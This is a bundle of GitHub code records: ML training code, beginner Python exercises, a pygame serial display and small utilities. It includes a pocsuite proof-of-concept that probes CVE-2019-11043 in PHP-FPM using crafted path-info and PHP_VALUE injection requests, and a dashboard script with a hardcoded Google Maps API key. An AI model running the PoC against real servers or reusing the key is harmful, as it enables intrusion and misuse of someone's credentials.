paths\nTRAIN_IMG_PATH = \"datasets/hico/images/train2015/\"\n\n# Setup training device\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nprint('training on {}'.format(device))\n\n# Define arguments\nbatch_size = 32\nepochs = 300\ninitial_lr = 0.0005\nfinal_lr = 0.1 # Only for adabound optimizer\nl2_weight_decay = 0.00005\nweighted_loss_alpha = 1 # Boost the weight of positives to help negative dominance\nweighted_loss_beta = 0.9999 # From the class based balance formula\n\nfeat_type = 'fc7'\ndata_aug = False\nexp_ver = 'v2_nl2_' + datetime.datetime.now().strftime(\"%Y-%m-%d_%H-%M\")\n# w = weighted loss, n = normalized (/255), l2 = l2 norm\n# 0 = adagrad, 1 = adabound\nsave_dir = './checkpoints/hico'\nlog_dir = './log/hico'\nsave_every = 5\nprint_batch_every = 100\nprint_epoch_every = 1\n\n# set the cache size [0 means infinite]\nmax_img_cache_size = 1 #40000\n\nprint('Running experiment ' + exp_ver)\n\n# Define dataloaders\ndata_const = HicoConstants(feat_type=feat_type)\n\ntrain_dataset = HicoDataset(data_const=data_const, subset='train', data_aug=data_aug)\nval_dataset = 
HicoDataset(data_const=data_const, subset='val', data_aug=False, test=True)\ndataset = {'train': train_dataset, 'val': val_dataset}\nprint('Set up dataset variable successfully')\n\ntrain_dataloader = DataLoader(dataset=dataset['train'], batch_size=batch_size, shuffle=True, collate_fn=collate_fn, drop_last=True)\nval_dataloader = DataLoader(dataset=dataset['val'], batch_size=batch_size, shuffle=True, collate_fn=collate_fn, drop_last=True)\ndataloader = {'train': train_dataloader, 'val': val_dataloader}\nprint('Set up dataloader successfully')\n\n# Define model\nmodel = HOCNN().to(device)\n\n# Display parameter information\nparameter_num = 0\nfor param in model.parameters():\n parameter_num += param.numel()\nprint(f'The number of parameters in this model is {parameter_num / 1e6} million')\n\n# Define weighted loss due to unbalanced dataset\n# Implemented class balanced loss from [https://github.com/richardaecn/class-balanced-loss]\n# The average of these weights is 1.0\n'''\nwith open('datasets/processed/hico/hoi_cls_count.json') as f:\n hoi_class_count = json.load(f)\n hoi_classes = hoi_class_count.keys()\n samples_per_class = np.zeros((len(hoi_classes), ))\n for hoi_class in hoi_classes:\n samples_per_class[int(hoi_class) - 1] = hoi_class_count[hoi_class]\n effective_num = 1.0 - np.power(weighted_loss_beta, samples_per_class)\n loss_weights = (1.0 - weighted_loss_beta) / np.array(effective_num)\n loss_weights = weighted_loss_alpha * loss_weights / np.sum(loss_weights) * len(hoi_classes)\n loss_weights = torch.tensor(loss_weights).float().to(device)\n'''\n\n# Todo: look at distribution balanced loss from [https://github.com/wutong16/DistributionBalancedLoss]\n \n# Weighted loss using difference between class sizes\n# Each class pos_weight is num_greatest_class / num_pos\n# It seems like the graients explode even using only the num_greatest\n'''\nwith open('datasets/processed/hico/hoi_cls_count.json') as f:\n hoi_class_count = json.load(f)\n hoi_classes = hoi_class_count.keys()\n samples_per_class = np.zeros((len(hoi_classes), ))\n greatest_sample = 0\n for hoi_class in hoi_classes:\n greatest_sample = max(greatest_sample, hoi_class_count[hoi_class])\n samples_per_class[int(hoi_class) - 1] = hoi_class_count[hoi_class]\n loss_weights = greatest_sample / samples_per_class\n loss_weights = torch.tensor(loss_weights).float().to(device)\n \nprint('Calculated loss weights')\n'''\n\n# Define loss function\ncriterion = nn.BCEWithLogitsLoss()\n#criterion = nn.BCEWithLogitsLoss(reduction='none')\n#criterion = nn.BCEWithLogitsLoss(pos_weight=loss_weights)\n#criterion = nn.CrossEntropyLoss()\n\n# Define optimizer\noptimizer = optim.Adam(model.parameters(), lr=initial_lr, weight_decay=l2_weight_decay)\n#optimizer = adabound.AdaBound(model.parameters(), lr=initial_lr, final_lr=final_lr, weight_decay=l2_weight_decay)\n#optimizer = optim.SGD(model.parameters(), lr=initial_lr, momentum=0.9, weight_decay=0)\n\n# Setup visualization\nwriter = SummaryWriter(log_dir=log_dir + '/' + exp_ver + '/' + 'epoch_train')\nio.mkdir_if_not_exists(os.path.join(save_dir, exp_ver, 'epoch_train'), recursive=True)\n\n# Training loop\nwith open('datasets/processed/hico/anno_list.json') as f:\n anno_list = json.load(f)\n \nimg_cache = {} # format {key: [human, object, pairwise]}\nimg_cache_counter = 0\n \nprint('Training has started!')\n \nfor epoch in range(epochs):\n epoch_loss = 0\n epoch_accuracy = 0\n for phase in ['train', 'val']:\n start_time = time.time()\n running_loss = 0.0\n running_correct = 0\n idx = 0\n \n for data 
in dataloader[phase]:\n            train_data = data\n            img_name = train_data['img_name']\n\n            labels = np.zeros((batch_size, 600))\n            batch_correct = 0\n            for i in range(batch_size):\n                # Get image data\n                parsed_img_name = img_name[i].split(\".\")[0]\n                img = [x for x in anno_list if x['global_id'] == parsed_img_name][0]\n                img_data = img['hois'][0]\n                pos_hois = list(map(int, img['pos_hoi_ids']))\n                for pos_hoi in pos_hois:\n                    labels[i][pos_hoi - 1] = 1\n                human_bboxes = img_data['human_bboxes']\n                object_bboxes = img_data['object_bboxes']\n\n                # Apply masks to images [with caching]\n                src_img_path = TRAIN_IMG_PATH + parsed_img_name + '.jpg'\n                if src_img_path in img_cache: # Use cache if available\n                    human_bbox_img, obj_bbox_img, pairwise_bbox_img = img_cache[src_img_path]\n                else:\n                    src = cv2.imread(src_img_path)\n                    human_mask = np.zeros_like(src)\n                    for bbox in human_bboxes:\n                        cv2.rectangle(human_mask, (bbox[0], bbox[1]), (bbox[2], bbox[3]), (255, 255, 255), thickness=-1)\n                    human_bbox_img = cv2.bitwise_and(src, human_mask, mask=None)\n\n                    obj_mask = np.zeros_like(src)\n                    pairwise_mask = human_mask.copy()  # copy so drawing the object boxes does not mutate human_mask in place\n                    for bbox in object_bboxes:\n                        cv2.rectangle(obj_mask, (bbox[0], bbox[1]), (bbox[2], bbox[3]), (255, 255, 255), thickness=-1)\n                        cv2.rectangle(pairwise_mask, (bbox[0], bbox[1]), (bbox[2], bbox[3]), (255, 255, 255), thickness=-1)\n                    obj_bbox_img = cv2.bitwise_and(src, obj_mask, mask=None)\n                    pairwise_bbox_img = cv2.bitwise_and(src, pairwise_mask, mask=None)\n\n                    # Add to cache if within limits\n                    if not max_img_cache_size or img_cache_counter < max_img_cache_size:\n                        img_cache[src_img_path] = [human_bbox_img, obj_bbox_img, pairwise_bbox_img]\n                        img_cache_counter += 1\n\n                '''\n                # Visualization of masks NOTE: Not guaranteed to work outside of jupyter notebook\n                f, axarr = plt.subplots(1,3)\n\n                human_bbox_rgb = cv2.cvtColor(human_bbox_img, cv2.COLOR_BGR2RGB)\n                axarr[0].imshow(human_bbox_rgb)\n\n                object_mask_rgb = cv2.cvtColor(obj_bbox_img, cv2.COLOR_BGR2RGB)\n                axarr[1].imshow(object_mask_rgb)\n\n                pairwise_rgb = cv2.cvtColor(pairwise_bbox_img, cv2.COLOR_BGR2RGB)\n                axarr[2].imshow(pairwise_rgb)\n\n                plt.show()\n                f.clf()\n                '''\n\n                human_bbox_img = cv2.resize(human_bbox_img, (64, 64), interpolation=cv2.INTER_AREA)\n                obj_bbox_img = cv2.resize(obj_bbox_img, (64, 64), interpolation=cv2.INTER_AREA)\n                pairwise_bbox_img = cv2.resize(pairwise_bbox_img, (64, 64), interpolation=cv2.INTER_AREA)\n\n                # Normalize images by dividing by 255\n                human_bbox_img = human_bbox_img/255\n                obj_bbox_img = obj_bbox_img/255\n                pairwise_bbox_img = pairwise_bbox_img/255\n\n                human_bbox_img = torch.from_numpy(human_bbox_img).to(device)\n                obj_bbox_img = torch.from_numpy(obj_bbox_img).to(device)\n                pairwise_bbox_img = torch.from_numpy(pairwise_bbox_img).to(device)\n\n                if i == 0:\n                    res_human_input = human_bbox_img.unsqueeze(0)\n                    res_obj_input = obj_bbox_img.unsqueeze(0)\n                    res_pairwise_input = pairwise_bbox_img.unsqueeze(0)\n                else:\n                    res_human_input = torch.cat((res_human_input, human_bbox_img.unsqueeze(0)), dim=0)\n                    res_obj_input = torch.cat((res_obj_input, obj_bbox_img.unsqueeze(0)), dim=0)\n                    res_pairwise_input = torch.cat((res_pairwise_input, pairwise_bbox_img.unsqueeze(0)), dim=0)\n\n            res_human_input = res_human_input.permute([0,3,1,2]).float().to(device)\n            res_obj_input = res_obj_input.permute([0,3,1,2]).float().to(device)\n            res_pairwise_input = res_pairwise_input.permute([0,3,1,2]).float().to(device)\n            labels = torch.from_numpy(labels).float().to(device)\n\n            if phase == 'train':\n                # Initial train loop\n                model.train()\n                model.zero_grad()\n\n                # Forward pass: human, 
objects, pairwise streams\n outputs = model.forward(res_human_input, res_obj_input, res_pairwise_input)\n loss = criterion(outputs, labels)\n #loss = (loss * loss_weights).mean()\n loss.backward()\n optimizer.step()\n \n preds = torch.argmax(outputs, dim=1)\n for accuracy_iterator in range(len(preds)):\n ground_labels = torch.nonzero(labels[accuracy_iterator]).squeeze()\n if preds[accuracy_iterator] in ground_labels:\n batch_correct += 1\n \n else:\n # Evaluation after train loop\n model.eval()\n with torch.no_grad(): # Disable gradients for validation\n outputs = model.forward(res_human_input, res_obj_input, res_pairwise_input)\n loss = criterion(outputs, labels)\n #loss = (loss * loss_weights).mean()\n \n preds = torch.argmax(outputs, dim=1)\n for accuracy_iterator in range(len(preds)):\n ground_labels = torch.nonzero(labels[accuracy_iterator]).squeeze()\n if preds[accuracy_iterator] in ground_labels:\n batch_correct += 1\n \n # Accumulate loss of each batch (average * batch size)\n running_loss += loss.item() * batch_size\n running_correct += batch_correct\n \n # Print out status per print_batch_every\n idx += 1\n if (idx % print_batch_every) == 0:\n print(\"[{}] Epoch: {}/{} Batch: {}/{} Loss: {} Accuracy: {}\".format(\\\n phase, epoch+1, epochs, idx, len(dataloader[phase]), \\\n loss.item(), 100 * batch_correct / batch_size))\n \n # Epoch loss and accuracy\n epoch_loss = running_loss / len(dataset[phase])\n epoch_accuracy = 100 * running_correct / len(dataset[phase])\n \n # Log trainval data for visualization\n if phase == 'train':\n train_loss = epoch_loss \n train_accuracy = epoch_accuracy\n else:\n writer.add_scalars('trainval_loss_epoch', {'train': train_loss, 'val': epoch_loss}, epoch)\n writer.add_scalars('trainval_accuracy_epoch', {'train': train_accuracy, 'val': epoch_accuracy}, epoch)\n \n # Output data per print_epoch_every\n if (epoch % print_epoch_every) == 0:\n end_time = time.time()\n print(\"[{}] Epoch: {}/{} Loss: {} Accuracy: {} Execution time: {}\".format(\\\n phase, epoch+1, epochs, epoch_loss, epoch_accuracy, (end_time-start_time)))\n \n # Save the model per save_every\n if epoch_loss<0.000405 or epoch % save_every == (save_every - 1) and epoch >= (10-1):\n checkpoint = { \n 'lr': initial_lr,\n 'b_s': batch_size,\n 'feat_type': feat_type,\n 'state_dict': model.state_dict()\n }\n save_name = \"checkpoint_\" + str(epoch+1) + '_epoch.pth'\n torch.save(checkpoint, os.path.join(save_dir, exp_ver, 'epoch_train', save_name))\n \nprint('Finishing training!')\n\n# Close visualization\nwriter.close()\n","repo_name":"callaunchpad/interact","sub_path":"cnn_baseline_weightedmultilabel.py","file_name":"cnn_baseline_weightedmultilabel.py","file_ext":"py","file_size_in_byte":13667,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"18900564999","text":"nombres = [\"juan\", \"maria\", \"pedro\"]\ncalificaciones = [9, 8, 6]\n\n# Crear diccionario de alumnos y calificaciones\nestudiantes = {\n \"juan\": 9,\n \"maria\": 8,\n \"pedro\": 6\n}\n\n# Accder a datos de un diccionario\nprint(\"La calificación de juan es: \" + str(estudiantes[\"juan\"]))\n\n# Añadir valores a un diccionario\nestudiantes[\"ana\"] = 10\n\n# actualizar valores de un diccionario\nestudiantes[\"pedro\"] = 10\n\n# Empezar con un diccionario vacío / y estructura de datos\nestadisticas = {}\nestadisticas[\"dari\"] = [10, 561241, 5412, 42135213]\nestadisticas[\"abel\"] = [23, 213, 321, 31223]\n\"\"\"\n{\n \"dari\": [10, 561241, 5412, 42135213], \n \"abel\": 
[23, 213, 321, 31223]\n}\n\"\"\"\nprint (estadisticas)\n\n# Diccionarios dentro de diccionario\nestadisticas = {}\nestadisticas[\"dari\"] = {\n \"viwers\": 100,\n \"comentarios\": 200,\n \"likes\": 300\n}\nestadisticas[\"abel\"] = {\n \"viwers\": 1213,\n \"comentarios\": 213523,\n \"likes\": 1235\n}\nprint (estadisticas)\nprint ()\n\n# Remover elementos de un diccionario\ndel estadisticas[\"abel\"]\nprint (estadisticas)\nprint ()\n\n# Actualizar valores anidados\nestadisticas[\"dari\"][\"viwers\"] = \"10000\"\nprint (estadisticas)","repo_name":"darideveloper/cursos-y-clases","sub_path":"Gustavo/fundamentos de python/6_dicionarios/gestionar_diccionarios.py","file_name":"gestionar_diccionarios.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"es","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"13514321596","text":"# Escreva um programa que leia um número n inteiro qualquer e mostre na tela os n primeiros elementos de uma Sequência de FIBONACCI. Ex. 0-> 1-> 1-> 2-> 3-> 5-> 8\n\nprint('\\033[34m-=-'*5, '\\033[36m SEQUÊNCIA DE FIBONACCI \\033[m', '\\033[34m--=-'*5, '\\033[m')\nn = int(input('Quantos termos voce quer vê? '))\n\nt1 = 0 # termos iniciais fixos (de acordo com a teoria)\nt2 = 1\ncontador = 3 # começa do 3 , pq o primeiro e o segundo ja foram\nprint('~'*50)\nprint('{} -> {}'.format(t1, t2), end='')\nwhile contador <= n:\n t3 = t1 + t2 \n print(' -> {}'.format(t3), end='')\n t1 = t2 # deslocando os termos\n t2 = t3 \n contador += 1\nprint(' -> FIM') \nprint('~'*50)","repo_name":"mercedesDiniz/Basic_Python","sub_path":"Exercicios/ex063.py","file_name":"ex063.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38622975190","text":"import classs\ndef number(a,ans,flag):\n\tif flag==0:\n\t\tans=ans+\" \"+a\n\telse:\n\t\tans=ans+a\n\treturn ans\ndef co(a):\n\tif a==-1:\n\t\treturn 1\n\telif a==\"(\":\n\t\treturn 2\n\telif a==\"+\" or a==\"-\":\n\t\treturn 3\n\telif a==\"*\" or a==\"/\" or a==\"%\":\n\t\treturn 4 \ndef operator(a,ans):\n\tif(a=='('):\n\t\ts.push(a)\n\telif(a==')'):\n\t\twhile(s.seek()!='('):\n\t\t\tans=ans+\" \"+s.pop()\n\t\ta=s.pop()\n\telse:\n\t\tb=s.seek()\n\t\tif co(a)>co(b):\n\t\t\ts.push(a)\n\t\telse:\n\t\t\twhile(co(a)<=co(s.seek())):\n\t\t\t\tans=ans+\" \"+s.pop()\n\t\t\ts.push(a)\n\treturn ans\ndef intopo(a,ans,flag):\n\tn=len(a)\n\tfor i in range(n):\n\t\t\n\t\tif a[i]>='0' and a[i]<='9':\n\t\t\tans=number(a[i],ans,flag)\n\t\t\tflag=1\n\t\telse:\n\t\t\tans=operator(a[i],ans)\n\t\t\tflag=0\n\t\t\n\twhile(s.seek()!=-1):\n\t\tans=ans+\" \"+s.pop()\n\treturn ans\ns=classs.stack()\n","repo_name":"akshayanagaraj/Calculator","sub_path":"infixtopostfix.py","file_name":"infixtopostfix.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72867819641","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\nwith open('numbers.txt', 'w') as f:\n # s1 = np.random.gamma(2, 1, 10**5*2//3)\n # s2 = np.random.gamma(7.5, 1, 10**5//3)\n\n # s = s1.tolist() + s2.tolist()\n\n s1 = np.random.normal(1000, 250, 10**5*6//10)\n s2 = np.random.normal(400, 200, 10**5*3//10)\n s3 = np.random.normal(100, 60, 10**5//10)\n\n s = s1.tolist() + s2.tolist() + s3.tolist()\n np.random.shuffle(s)\n\n count, bins, ignored = plt.hist(s, bins=20, density=True)\n plt.show()\n for i in s:\n 
f.write(f'{i:.3f}\\n')\n\n","repo_name":"da-frog/sea-freight-shipping","sub_path":"scripts/generate_commodity_size_weights.py","file_name":"generate_commodity_size_weights.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11068320583","text":"import matplotlib.pyplot as plt\nimport time\nimport serial\nimport pygame\nimport numpy as np\npygame.init()\n\n#open com\nser = serial.Serial('COM3',9600)\n\n#colors\nbak_color = (100,200,0)\nred = (200,0,0)\nblue = (0,200,240)\n\n#screen demensions\nscreen_width = 1200\nscreen_height = 790\n\n#create display\npygame.display.set_caption('fineass')\ndisplay = pygame.display.set_mode((screen_width,screen_height))\n\n#ancor\nmid_x = []\nmid_y = []\nfor i in range(100):\n mid_x.append(screen_width/2)\n mid_y.append(screen_height/2)\nang = 0\ndist = 0\ncount = 0\n\nrun = True\nwhile run:\n #dellay and screen reset\n pygame.time.delay(30)\n display.fill(bak_color)\n \n #increase count\n count = count+1\n if count > len(mid_x)-1:\n count = 0\n #read serial\n st = ser.readline()\n \n if ser.readline()[:] != \"b'\\xff37\\r\\n'\": # Make sure that the read line isn't this as this is the first line outputted from the serial and it causes errors in the code\n b = ser.readline() # read a byte string line from the Arduino's serial output\n string_n = b.decode() # decode byte string into regular Python string\n int_b = float(string_n)\n \n #seperate data\n if int_b > 10000:\n ang = (int_b-10000)*np.pi/180\n elif int_b < 10000:\n if int_b < 1300:\n dist = int_b\n else:\n dist = 1300\n \n \n #draw circles\n try:\n mid_x[count] = screen_width/2+dist*np.cos(ang)/3\n mid_y[count] = screen_height/2-dist*np.sin(ang)/3\n except:\n print(count)\n \n #target\n pygame.draw.circle(display, blue, (int(screen_width/2), int(screen_height/2)), 15, 15)\n pygame.draw.circle(display, blue, (int(screen_width/2), int(screen_height/2)), 200, 100)\n pygame.draw.circle(display, blue, (int(screen_width/2), int(screen_height/2)), 400, 100)\n pygame.draw.circle(display, blue, (int(screen_width/2), int(screen_height/2)), 600, 100)\n \n #distances\n for i in range(6):\n if i != 2 and i != 4 and i != 0:\n OUT = str(100*i)+'mm'\n font = pygame.font.Font('freesansbold.ttf', 20)\n text = font.render(OUT, True, bak_color, blue)\n textRect = text.get_rect()\n textRect.center = (screen_width/2, screen_height/2-10-100*i)\n display.blit(text, textRect) \n elif i == 0:\n OUT = str(100*i)\n font = pygame.font.Font('freesansbold.ttf', 20)\n text = font.render(OUT, True, bak_color, blue)\n textRect = text.get_rect()\n textRect.center = (screen_width/2, screen_height/2)\n display.blit(text, textRect)\n else:\n OUT = str(100*i)+'mm'\n font = pygame.font.Font('freesansbold.ttf', 20)\n text = font.render(OUT, True, blue, bak_color)\n textRect = text.get_rect()\n textRect.center = (screen_width/2, screen_height/2-10-100*i)\n display.blit(text, textRect) \n \n #draw objs \n for i in range(len(mid_x)):\n pygame.draw.circle(display, red, (int(mid_x[i]), int(mid_y[i])), 5, 5)\n \n #update screen\n pygame.display.update()\n \n #quite\n for event in pygame.event.get() : \n if event.type == pygame.QUIT : \n pygame.quit() \n run = False\n ser.close()","repo_name":"wrafaelharr/Python_projects","sub_path":"self_driving_rc_car/python for scanner/python scanner read.py","file_name":"python scanner 
read.py","file_ext":"py","file_size_in_byte":3323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8744884258","text":"\r\nfrom sympy import *\r\n\r\nx, y, z = symbols('x y z')\r\n\r\n#Система уравнений\r\nf1 = x * y + y * z - 8\r\nf2 = y * z + z * x - 9\r\nf3 = z * x + x * y - 5\r\n\r\n#Диффернцируем обе функции по х и по у\r\nf1x, f1y, f1z = diff(f1, x), diff(f1, y), diff(f1, z)\r\nf2x, f2y, f2z = diff(f2, x), diff(f2, y), diff(f2, z)\r\nf3x, f3y, f3z = diff(f3, x), diff(f3, y), diff(f3, z)\r\n\r\n#Находим определители\r\nd = (f1x * f2y * f3z) + (f1y * f2z * f3x) + (f2x * f3y * f1z) - (f3x * f2y * f1z) - (f2x * f1y * f3z) - (f2z * f3y * f1x)\r\ndx = (f1 * f2y * f3z) + (f1y * f2z * f3) + (f2 * f3y * f1z) - (f3 * f2y * f1z) - (f2 * f1y * f3z) - (f2z * f3y * f1)\r\ndy = (f1x * f2 * f3z) + (f1 * f2z * f3x) + (f2x * f3 * f1z) - (f3x * f2 * f1z) - (f2x * f1 * f3z) - (f2z * f3 * f1x)\r\ndz = (f1x * f2y * f3) + (f1y * f2 * f3x) + (f2x * f3y * f1) - (f3x * f2y * f1) - (f2x * f1y * f3) - (f2 * f3y * f1x)\r\n\r\nxi, yi, zi = 0.5, 0.5, 0.5\r\ne = 1\r\nwhile e > 0.01:\r\n #фактические значения определителей\r\n dxi = dx.evalf(subs={'x':xi, 'y':yi, 'z':zi})\r\n dyi = dy.evalf(subs={'x':xi, 'y':yi, 'z':zi})\r\n dzi = dz.evalf(subs={'x': xi, 'y': yi, 'z': zi})\r\n di = d.evalf(subs={'x':xi, 'y':yi, 'z':zi})\r\n #уточнение решения заданной системы\r\n xi = xi - dxi / di\r\n yi = yi - dyi / di\r\n zi = zi - dzi / di\r\n e = max(dxi, dyi, dzi)\r\n\r\nprint(xi, yi, zi)","repo_name":"Richdeg/die-Hausaufgaben","sub_path":"lab5(1).py","file_name":"lab5(1).py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19153591869","text":"from random import *\nfrom datetime import *\n\ndef get_date() : # 랜덤 날짜 생성 함수\n start = date(2010, 10, 1) # 2010.10.1을 시작일로 변수에 저장\n today = datetime.today() # 오늘 날짜를 변수에 저장\n end = date(today.year, today.month, today.day) # 오늘 날짜의 시간을 제외한 년월일만 end 변수에 저장\n random_date = start + (end - start) * random() # end 날짜에서 start 날짜 사이의 랜덤 날짜 생성\n return random_date # 생성된 랜덤 날짜 return\n\n\ndef get_weekday(date: date) :\n date_dict = {0: 'Mon.', 1:'Tue.', 2:'Wed.', 3:'Thu.', 4:'Fri.', 5:'Sat.', 6:'Sun.'} # 요일을 dictionary 에 저장\n return date_dict[date.weekday()] # date의 요일을 return (weekday()는 요일에 따라 월~일을 0~6으로 return 해주는 datetime 모듈의 내장 함수)\n\nnames = []\nbirth_days = []\nopt = False\nwhile True :\n while not opt : # opt 가 False 면 실행\n inputs = input(\"Enter names seperated by comma: \").split(\",\") # ','를 기준으로 split\n for i in inputs :\n i = i.strip() # 좌우 공백 제거\n if i != \"\" and not i in names : # 공백이 아니면 names에 append\n names.append(i) \n \n print(\"Valid names received are \", names)\n \n if len(names) > 2 : # names에 저장된 이름의 갯수가 2보다 크면 break\n break\n else : # names에 저장된 이름의 갯수가 2보다 작거나 같으면 에러 메시지 출력\n print(\"The number of valid names is less than 3.\")\n\n if not opt : # opt가 False면 실행\n print(\"*\" * 30)\n for i in range(len(names)) :\n birth_days.append(get_date()) # 랜덤 날짜를 생일로 저장\n print(names[i], '\\t', birth_days[i]) # 데이터 출력\n print(\"*\" * 30)\n\n u_index = -1 # user가 고르는 이름의 index 저장 변수\n c_index = -1 # computer가 고르는 이름의 index 저장 변수\n while True :\n character = input(\"Please choose your character among %s:\" % names) # 이름 입력 받기\n \n if character in names : # 유효한 이름이면\n u_index = names.index(character) # u_index에 해당 이름의 index 저장\n break\n \n c_index = randrange(0, len(names)) # c_index에 0 ~ (names의 길이 -1) 값 사이에 있는 값 랜덤으로 
저장\n print(\"You have chosen %s born in %s (%s)\" % (names[u_index], birth_days[u_index], get_weekday(birth_days[u_index]))) # u_index에 해당하는 데이터 출력\n print(\"The computer has chosen %s born in %s (%s)\" % (names[c_index], birth_days[c_index], get_weekday(birth_days[c_index]))) # c_index에 해당하는 데이터 출력\n \n result_str = \"\" # 결과 출력에 해당하는 문자열 변수\n if c_index == u_index : # u_index 와 c_index 가 같으면 같다고 출력\n print(\"They are same person.\")\n else : # u_index와 c_index가 다른 값이면 실행\n if birth_days[u_index] < birth_days[c_index] : # u_index의 해당하는 생일 날짜가 더 옛날이면 u_index가 order\n result_str = \"order than\" # result_str에 order than 저장\n elif birth_days[u_index] > birth_days[c_index] : # u_index의 해당하는 생일 날짜가 더 최근이면 u_index가 younger\n result_str = \"younger than\" # result_str에 younger than 저장\n else :\n result_str = \"the same age as\" # 같은 날짜면 the same age as 저장\n \n print(\"%s is %s %s.\" % (names[u_index], result_str, names[c_index])) # 결과 출력\n \n if \"y\" == input(\"Do you want to play again? (y):\") : # 입력 값이 'y'면 opt 값을 True로 변경\n opt = True\n else : # 입력 값이 'y'가 아니면 break\n break\n\n","repo_name":"Ohgyuchan/cs-study","sub_path":"python/python_class/21700443_OhGyuchan_hw2.py","file_name":"21700443_OhGyuchan_hw2.py","file_ext":"py","file_size_in_byte":3814,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11653987451","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom pocsuite.api.poc import register\nfrom pocsuite.api.poc import Output, POCBase\nfrom urlparse import urlparse,urljoin\nfrom pocsuite.api.utils import randomStr\nfrom pocsuite.api.request import req\nimport socket\n\nclass PhpUip():\n def __init__(self, url):\n self.MinQSL = 1500\n self.MaxQSL = 1950\n self.url = url\n self.BreakingPayload = \"/PHP%0Ais_the_shittiest_lang.php\"\n self.PossibleQSLs = []\n self.MaxPisosLength = 256\n self.qslandpisos = None\n \n def get_baseStatus(self):\n target = self.url + \"/path%0Ainfo.php?{}\".format('Q'*(self.MinQSL-1))\n self.baseStatus = req.get(target).status_code\n \n def get_qsl(self):\n for qsl in range(self.MinQSL, self.MaxQSL, 5):\n resp = req.get(self.url + self.BreakingPayload + \"?\" + \"Q\"*(qsl-1))\n if resp.status_code != self.baseStatus:\n self.PossibleQSLs = [qsl, qsl - 5 , qsl - 10]\n \n def SanityCheck(self):\n header = {\n \"D-Pisos\": \"8{}D\".format(\"=\"*self.MaxPisosLength)\n }\n for _ in range(10):\n if req.get(self.url + \"/PHP%0ASOSAT?\" + \"Q\"*(self.MaxQSL - 1), headers = header).status_code == self.baseStatus:\n pass\n else:\n return False\n return True\n \n def get_pisos(self):\n host = urlparse(self.url).hostname\n port = urlparse(self.url).port\n for qsl in self.PossibleQSLs:\n for pisos in range(self.MaxPisosLength):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n head = \"GET /index.php/PHP_VALUE%0Asession.auto_start=1;;;?{} HTTP/1.1\\r\\n\".format(\"Q\"*(qsl-1))\n head += \"Host: {}:{}\\r\\n\".format(host, str(port))\n head += \"User-Agent: Mozilla/5.0\\r\\n\"\n head += \"D-Pisos: 8{}D\\r\\n\".format(\"=\"*pisos)\n head += \"Ebut: mamku tvoyu\\r\\n\\r\\n\"\n s.connect((host, port))\n s.send(head)\n recv = s.recv(1024)\n if \"PHPSESSID\" in recv and \"path=\" in recv:\n self.qslandpisos = (qsl, pisos)\n return\n s.close()\n\n def poc(self):\n self.get_baseStatus()\n self.get_qsl()\n if self.PossibleQSLs:\n if self.SanityCheck():\n self.get_pisos()\n if self.qslandpisos:\n return True\n return False\n\n\n\nclass TestPOC(POCBase):\n vulID = 'N/A' # ssvid\n version = '1.0'\n author = 
'fairy'\n vulDate = ''\n createDate = ''\n updateDate = ''\n references = ['']\n name = ''\n appPowerLink = ''\n appName = ''\n appVersion = ''\n vulType = ''\n desc = ''' \n '''\n samples = ['']\n install_requires = ['']\n def _verify(self):\n result = {}\n test = PhpUip(self.url + '/index.php')\n\n if test.poc():\n result['VerifyInfo'] = {}\n result['VerifyInfo']['URL'] = self.url\n\n return self.parse_output(result)\n\n\n _attack = _verify\n\n \n def parse_output(self, result):\n output = Output(self)\n if result:\n output.success(result)\n else:\n output.fail('Internet nothing returned')\n return output\n\nregister(TestPOC)\n","repo_name":"20142995/pocsuite","sub_path":"poc/CVE-2019-11043.py","file_name":"CVE-2019-11043.py","file_ext":"py","file_size_in_byte":3344,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"34533354680","text":"import os\nimport json\nimport csv\nimport googlemaps\nfrom datetime import datetime\n\n\nclass OpenFile:\n\n def __init__(self, filename, mode):\n self._file = open(filename, mode)\n\n def __enter__(self):\n return self._file\n\n def __exit__(self, type, value, traceback):\n self._file.close()\n return True\n\nclass Maps:\n\n def __init__(self, key):\n self._client = googlemaps.Client(key=key)\n\n def __enter__(self):\n return self._client\n\n def __exit__(self, error_type, value, traceback):\n del self._client\n return True\n\nclass Task:\n\n def __init__(self, title, priority = 1):\n self.done = False\n self.title = title\n self.priority = priority\n self.location = None\n\n def __str__(self):\n return self.title\n\n @property\n def priority(self):\n return self._priority\n\n @priority.setter\n def priority(self, value):\n if int(value) in range(1, 11):\n self._priority = value\n else:\n raise ValueError('Priority value is out of range')\n\n def add_location(self):\n place_lookup = input('Enter location name: \\t')\n with Maps(key='AIzaSyDZUTx1HWrOcNDng1V7-smaaHTBSobrw0I') as gmaps:\n place = gmaps.find_place(\n place_lookup,\n 'textquery',\n fields=['geometry/location', 'name', 'place_id']\n )\n if place['status'] == 'OK':\n self.location = {\n 'coordinates': place['candidates'][0]['geometry']['location'],\n 'name': place['candidates'][0]['name'],\n 'google_id': place['candidates'][0]['place_id']\n }\n\n\nclass Dashboard:\n\n def __init__(self):\n self.task_list = []\n\n def add_task(self):\n title = input('Task name: ')\n priority = input('Priority: ')\n new_task = Task(title, priority)\n self.task_list.append(new_task)\n\n def print_all_tasks(self):\n for task in self.task_list:\n print(task)\n\n def print_all_tasks_by_priority(self, temp_priority):\n temp_list = []\n for task in self.task_list:\n if temp_priority == task.priority:\n 